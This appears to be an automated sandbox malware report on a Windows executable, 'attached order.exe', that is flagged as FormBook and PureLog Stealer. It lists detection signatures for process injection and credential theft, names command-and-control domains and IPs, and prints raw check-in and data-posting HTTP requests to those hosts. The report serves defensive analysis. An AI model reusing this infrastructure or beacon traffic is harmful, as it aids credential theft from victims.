Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
attached order.exe

Overview

General Information

Sample name:attached order.exe
Analysis ID:1563709
MD5:0879125fd7b75f462bc11eaebdb28445
SHA1:54f3cbafcdc1162d30db5167f64d4b98d0ce84c4
SHA256:3a4692716a5ddbc570a1d14328c50b7edf677631b2ac1ea9e99a77aa46de0993
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • attached order.exe (PID: 7972 cmdline: "C:\Users\user\Desktop\attached order.exe" MD5: 0879125FD7B75F462BC11EAEBDB28445)
    • attached order.exe (PID: 8136 cmdline: "C:\Users\user\Desktop\attached order.exe" MD5: 0879125FD7B75F462BC11EAEBDB28445)
    • attached order.exe (PID: 1792 cmdline: "C:\Users\user\Desktop\attached order.exe" MD5: 0879125FD7B75F462BC11EAEBDB28445)
      • RAVCpl64.exe (PID: 7176 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • cacls.exe (PID: 6932 cmdline: "C:\Windows\SysWOW64\cacls.exe" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
          • firefox.exe (PID: 7932 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.16561859855.0000000009E20000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
    00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.16558585775.0000000004BD8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
        00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.attached order.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              0.2.attached order.exe.9e20000.5.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.attached order.exe.4c15848.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.attached order.exe.4bf5828.4.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0.2.attached order.exe.4bf5828.4.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 3 entries

                      Sigma Signatures

                      No Sigma rule has matched

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-11-27T11:28:57.522385+010020507451Malware Command and Control Activity Detected192.168.11.204974574.208.236.15680TCP
                      2024-11-27T11:29:22.565445+010020507451Malware Command and Control Activity Detected192.168.11.204974984.32.84.3280TCP
                      2024-11-27T11:29:36.291018+010020507451Malware Command and Control Activity Detected192.168.11.204975313.248.169.4880TCP
                      2024-11-27T11:29:50.011210+010020507451Malware Command and Control Activity Detected192.168.11.204975766.29.149.4680TCP
                      2024-11-27T11:30:04.014102+010020507451Malware Command and Control Activity Detected192.168.11.2049761173.201.189.24180TCP
                      2024-11-27T11:30:19.723076+010020507451Malware Command and Control Activity Detected192.168.11.204976543.163.1.11080TCP
                      2024-11-27T11:30:34.386330+010020507451Malware Command and Control Activity Detected192.168.11.2049769104.21.7.18780TCP
                      2024-11-27T11:30:49.772725+010020507451Malware Command and Control Activity Detected192.168.11.2049773103.230.159.8680TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Multi AV Scanner detection for submitted file
                      Source: attached order.exeReversingLabs: Detection: 34%
                      Yara detected FormBook
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.attached order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.17794388599.0000000000AD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16879309688.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17794768022.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.17793264483.0000000000660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.16880552732.0000000001640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Machine Learning detection for sample
                      Source: attached order.exeJoe Sandbox ML: detected
                      Source: attached order.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: attached order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: cacls.pdbGCTL source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: cacls.pdb source: attached order.exe, 00000003.00000002.16880118360.00000000012A8000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: attached order.exe, attached order.exe, 00000003.00000002.16880703659.0000000001700000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000005.00000002.17794890422.0000000002FDD000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16883020772.0000000002CFD000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000003.16879645325.0000000002B4A000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000005.00000002.17794890422.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 5_2_0067C940 FindFirstFileW,FindNextFileW,FindClose,5_2_0067C940
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4x nop then mov ebx, 00000004h4_2_035FC4BE
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h5_2_00669E50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then xor eax, eax5_2_00669E50
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then pop edi5_2_0066E4AE
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov dword ptr [ebp-0000008Ch], 00000000h5_2_00669E46
                      Source: C:\Windows\SysWOW64\cacls.exeCode function: 4x nop then mov ebx, 00000004h5_2_032B04BE

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49745 -> 74.208.236.156:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49749 -> 84.32.84.32:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49757 -> 66.29.149.46:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49769 -> 104.21.7.187:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49761 -> 173.201.189.241:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49753 -> 13.248.169.48:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49765 -> 43.163.1.110:80
                      Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.11.20:49773 -> 103.230.159.86:80
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: www.aktmarket.xyz
                      Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                      Source: Joe Sandbox ViewIP Address: 84.32.84.32 84.32.84.32
                      Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
                      Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                      Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeCode function: 4_2_03601AF8 getaddrinfo,SleepEx,setsockopt,recv,recv,4_2_03601AF8
                      Source: global trafficHTTP traffic detected: GET /raea/?wIXhAG=PqKj/8KuIq0WSNkKBtYQxtP5ekYb45s1M43YI/iJd5qBB0feLv8ZTW6bO6iF0HlQbmuDykhZpdeI6maFWjppzEXgG+P+iq4B6j/LVW+OdEFKSgTrNoF3hmw=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.christinascuties.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /jytl/?wIXhAG=g6hM5OfAy0aZTOdwtizvGwaLh1tc9b9nbH1D7PSRWxwlxqBVZ/VTfBjjReyEGXu+lurHf7fRU8SuqLFFtve4Dt4YiF/6MWt/ODdeGmxIPeV05u7M1niwgNE=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.techmiseajour.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /wb7v/?wIXhAG=IA0aHAKfw1DI7BcblrymbxKn4Du9G2zIJhioZgrDgtprV+dFeA51d3E/BswRkzzY9dVkqa6lP7qo/SE9ZBwNIeIqaoIYusGiDzIcpGvOs3Qutuf7i9hpgx0=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.aktmarket.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /r2k9/?wIXhAG=R82aEe+RY/7ruopITyHmIZKE6mty2NjUuvMRSLNb4ss61aauImbQUc6g0t6KhpFZbU646xYhPfN8HrEmx58z8XzFwyYySaGgHUnkfWsMWJHlNdq0zf8f0Cc=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.golivenow.liveConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /rbqc/?wIXhAG=3OhzIPQDpE/WyOq4c50vyvr5MYwPqIJwFHC8VhGgYWlBNCQMRbA04kkXhcibOdGaaYQUE3h/dXM8I7VGN3rlp7Z3JwGHCuU5fs1gPxd74qpwzz3mNpUi2rk=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.iglpg.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficHTTP traffic detected: GET /pfw9/?wIXhAG=45l5W170mEENNSUnzK0Z1bPSyznn87pe/JClWAxqTX/Xh+MpzQee3BMDIBzH94Waz7MWeOxtR7oNILZ5PKGZEEUkdQIHW7SjWqUQF3RmeGAfM1BGU/Lu+bk=&67ssp=tVX5mtZ66UVF HTTP/1.1Accept: */*Accept-Language: en-US,en;q=0.9Host: www.1qcczjvh2.autosConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                      Source: global trafficDNS traffic detected: DNS query: www.christinascuties.net
                      Source: global trafficDNS traffic detected: DNS query: www.techmiseajour.net
                      Source: global trafficDNS traffic detected: DNS query: www.aktmarket.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.golivenow.live
                      Source: global trafficDNS traffic detected: DNS query: www.iglpg.online
                      Source: global trafficDNS traffic detected: DNS query: www.1qcczjvh2.autos
                      Source: global trafficDNS traffic detected: DNS query: www.gk88top.top
                      Source: global trafficDNS traffic detected: DNS query: www.superiorfencing.net
                      Source: unknownHTTP traffic detected: POST /jytl/ HTTP/1.1Accept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Host: www.techmiseajour.netCache-Control: max-age=0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 203Origin: http://www.techmiseajour.netReferer: http://www.techmiseajour.net/jytl/User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36Data Raw: 77 49 58 68 41 47 3d 74 34 4a 73 36 2b 37 61 30 47 4c 38 53 59 74 6b 76 79 37 6d 44 68 2b 33 2b 58 30 4f 6f 34 39 55 43 52 78 68 30 66 2b 32 4f 51 49 48 75 74 4a 79 61 75 55 35 55 51 44 61 65 4c 6d 4b 63 6d 43 34 33 49 4c 31 47 71 72 51 55 4d 4f 4e 72 6f 77 55 75 4f 4f 6f 4b 4e 55 65 6e 52 37 6d 50 6d 6f 67 47 31 34 35 45 55 74 6e 49 4b 5a 79 38 50 33 32 79 6a 6e 68 69 4f 51 75 4a 38 7a 79 62 6d 47 76 69 4e 2b 58 62 57 6a 79 46 45 58 44 37 70 4d 68 78 7a 64 30 6a 4b 79 62 5a 6a 30 65 41 61 44 55 6a 58 57 57 38 6f 2b 69 48 76 4a 6a 79 4c 41 55 56 6d 4f 54 4f 5a 46 50 69 73 67 6d 65 47 59 61 4c 51 3d 3d Data Ascii: wIXhAG=t4Js6+7a0GL8SYtkvy7mDh+3+X0Oo49UCRxh0f+2OQIHutJyauU5UQDaeLmKcmC43IL1GqrQUMONrowUuOOoKNUenR7mPmogG145EUtnIKZy8P32yjnhiOQuJ8zybmGviN+XbWjyFEXD7pMhxzd0jKybZj0eAaDUjXWW8o+iHvJjyLAUVmOTOZFPisgmeGYaLQ==
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 626Connection: closeDate: Wed, 27 Nov 2024 10:28:57 GMTServer: ApacheData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 22 3e 0a 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 30 61 33 32 38 63 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 30 65 6d 3b 22 3e 0a 20 20 20 45 72 72 6f 72 20 34 30 34 20 2d 20 4e 6f 74 20 66 6f 75 6e 64 0a 20 20 3c 2f 68 31 3e 0a 20 20 3c 70 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 30 2e 38 65 6d 3b 22 3e 0a 20 20 20 59 6f 75 72 20 62 72 6f 77 73 65 72 20 63 61 6e 27 74 20 66 69 6e 64 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 20 63 6f 72 72 65 73 70 6f 6e 64 69 6e 67 20 74 6f 20 74 68 65 20 55 52 4c 20 79 6f 75 20 74 79 70 65 64 20 69 6e 2e 0a 20 20 3c 2f 70 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN""http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Error 404 - Not found </title> <meta content="text/html; charset=utf-8" http-equiv="Content-Type"> <meta content="no-cache" http-equiv="cache-control"> </head> <body style="font-family:arial;"> <h1 style="color:#0a328c;font-size:1.0em;"> Error 404 - Not found </h1> <p style="font-size:0.8em;"> Your browser can't find the document corresponding to the URL you typed in. </p> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 10:29:41 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 10:29:44 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 27 Nov 2024 10:29:47 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 